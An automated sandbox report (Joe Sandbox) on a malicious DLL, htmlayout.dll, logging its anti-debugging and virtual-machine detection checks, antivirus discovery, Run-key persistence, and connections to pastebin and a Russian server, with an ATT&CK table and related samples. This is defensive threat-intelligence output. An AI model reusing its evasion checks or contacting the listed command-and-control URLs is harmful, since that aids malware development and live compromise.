Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\loaddll32.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Windows\System32\loaddll32.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Source: C:\Windows\SysWOW64\rundll32.exe

Thread sleep count: Count: 9964 delay: -10

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Window / User API: threadDelayed 9964

Source: C:\Windows\SysWOW64\rundll32.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0478E37C FindFirstFileW,		3_2_0478E37C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0478E37C FindFirstFileW,		5_2_0478E37C

Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 40000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 40000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 40000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 40000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 40000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 40000
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 40000
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 40000

Source: C:\Windows\System32\loaddll32.exe

System information queried: ModuleInformation

Hides threads from debuggers

Anti Debugging

Source: C:\Windows\System32\loaddll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Windows\SysWOW64\rundll32.exe	Open window title or class name: regmonclass
Source: C:\Windows\SysWOW64\rundll32.exe	Open window title or class name: gbdyllo
Source: C:\Windows\SysWOW64\rundll32.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Windows\SysWOW64\rundll32.exe	Open window title or class name: procmon_window_class
Source: C:\Windows\SysWOW64\rundll32.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Windows\SysWOW64\rundll32.exe	Open window title or class name: ollydbg
Source: C:\Windows\SysWOW64\rundll32.exe	Open window title or class name: filemonclass
Source: C:\Windows\SysWOW64\rundll32.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 756

System process connects to network (likely due to code injection or exploit)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 86.48.24.91 2000
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 172.67.34.170 443
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: pastebin.com
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 104.20.68.143 443
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 141.8.197.42 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: a0747694.xsph.ru
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 104.20.67.143 443	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",#1			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 756			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	11 Registry Run Keys / Startup Folder	111 Process Injection	1 Masquerading	1 Input Capture	43 Security Software Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	1 Web Service	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	11 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	331 Virtualization/Sandbox Evasion	Security Account Manager	331 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Ingress Tool Transfer	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	3 Non-Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Rundll32	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	14 Application Layer Protocol	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	2 Software Packing	DCSync	2 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
htmlayout.dll	42%	Virustotal		Browse
htmlayout.dll	100%	Avira	HEUR/AGEN.1217341
htmlayout.dll	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://www.indyproject.org/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
a0747694.xsph.ru	141.8.197.42	true	false		high
pastebin.com	172.67.34.170	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://pastebin.com/raw/kk8ua858	false		high
http://a0747694.xsph.ru/serv.php	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.indyproject.org/	rundll32.exe	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.20.68.143	unknown	United States	13335	CLOUDFLARENETUS	true
86.48.24.91	unknown	Denmark	16095	JAYNETSentiaDanmarkASDK	true
141.8.197.42	a0747694.xsph.ru	Russian Federation	35278	SPRINTHOSTRU	false
104.20.67.143	unknown	United States	13335	CLOUDFLARENETUS	true
172.67.34.170	pastebin.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	760314
Start date and time:	2022-12-04 22:23:14 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	htmlayout.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@27/6@9/6
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .dll Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212
Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
22:24:26	API Interceptor	24x Sleep call for process: rundll32.exe modified
22:24:30	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run rundll32.exe C:\Windows\SysWOW64\rundll32.exe
22:24:34	API Interceptor	1x Sleep call for process: loaddll32.exe modified
22:24:41	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run rundll32.exe C:\Windows\SysWOW64\rundll32.exe
22:25:00	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.20.68.143	eReceipt.vbs	Get hash	malicious	Browse	pastebin.com/raw/xcieuDzj
	QE2XQJIHZf.exe	Get hash	malicious	Browse	pastebin.com/raw/hbwHfEg3
	PI-INVTRD13022020_pdf.js	Get hash	malicious	Browse	pastebin.com/raw/UBFKq2Rw
	Proforma_Invoice_10022020_pdf.js	Get hash	malicious	Browse	pastebin.com/raw/UBFKq2Rw
	Jan-14-proforma-Invoice-pdf.js	Get hash	malicious	Browse	pastebin.com/raw/kux21KmL

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
pastebin.com	620000.vbc.exe	Get hash	malicious	Browse	172.67.34.170
	Mortage information files PDF_parsed.exe	Get hash	malicious	Browse	104.20.68.143
	WqUfKPKgPP.exe	Get hash	malicious	Browse	104.20.68.143
	AA7w56Lpwo.exe	Get hash	malicious	Browse	104.20.67.143
	r9z1fvWkqb.exe	Get hash	malicious	Browse	104.20.67.143
	file.exe	Get hash	malicious	Browse	104.20.68.143
	file.exe	Get hash	malicious	Browse	104.20.68.143
	9410577519C75DAB17A170287165CDD8F00F047FEE35A.exe	Get hash	malicious	Browse	104.20.67.143
	6E587363F78CB91DE1B18CFE6A44174EB9426B724BCC7.exe	Get hash	malicious	Browse	104.20.68.143
	63F13767CD38209385164D5517A55A6846996268F7C3C.exe	Get hash	malicious	Browse	104.20.67.143
	Stealer.exe	Get hash	malicious	Browse	172.67.34.170
	file.exe	Get hash	malicious	Browse	104.20.68.143
	bryD1wfWrB.exe	Get hash	malicious	Browse	172.67.34.170
	SecuriteInfo.com.Trojan.Siggen19.4846.9932.10970.exe	Get hash	malicious	Browse	172.67.34.170
	SecuriteInfo.com.Win32.PWSX-gen.2031.32670.exe	Get hash	malicious	Browse	172.67.34.170
	MDeBRRdude.exe	Get hash	malicious	Browse	104.20.67.143
	bGSZ.exe	Get hash	malicious	Browse	104.20.67.143
	bGU0.exe	Get hash	malicious	Browse	104.20.67.143
	AT1VkguKRA.exe	Get hash	malicious	Browse	172.67.34.170
	Monitor @1ona.exe	Get hash	malicious	Browse	172.67.34.170

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
JAYNETSentiaDanmarkASDK	TRmkc8dY9M.exe	Get hash	malicious	Browse	86.48.18.223
	EVONwD7gbk.elf	Get hash	malicious	Browse	81.7.204.222
	uKN06IFwCa.elf	Get hash	malicious	Browse	86.48.211.199
	LjxQ98SwUh.elf	Get hash	malicious	Browse	86.58.241.150
	vfsBcVwlIu.elf	Get hash	malicious	Browse	86.58.252.63
	Document.exe	Get hash	malicious	Browse	86.48.29.24
	https://painel.odara.com.br/emailmarketing/campain/click?uid=0DHW80SjYatjGiCSkwyN2eeKdSd8HVv+iJnWZVl/UoM=&cid=6xe1ewmLWczb+HUGaeYvZAuCLGYFZNNJzds0ln/P/TA=&eid=URUSXf7/enbQ6EQ5gwS9413gHiXe/igU+f2AK4l3b1g=&url=https://7tp4d2.codesandbox.io/hh-mary.zakaria#bWFyeS56YWthcmlhQGxpcXVpZGl0eXNlcnZpY2VzLmNvbQ==	Get hash	malicious	Browse	86.48.1.129
	https://painel.odara.com.br/emailmarketing/campain/click?uid=0DHW80SjYatjGiCSkwyN2eeKdSd8HVv+iJnWZVl/UoM=&cid=6xe1ewmLWczb+HUGaeYvZAuCLGYFZNNJzds0ln/P/TA=&eid=URUSXf7/enbQ6EQ5gwS9413gHiXe/igU+f2AK4l3b1g=&url=https://7tp4d2.codesandbox.io/hh-mary.zakaria#bWFyeS56YWthcmlhQGxpcXVpZGl0eXNlcnZpY2VzLmNvbQ==	Get hash	malicious	Browse	86.48.1.129
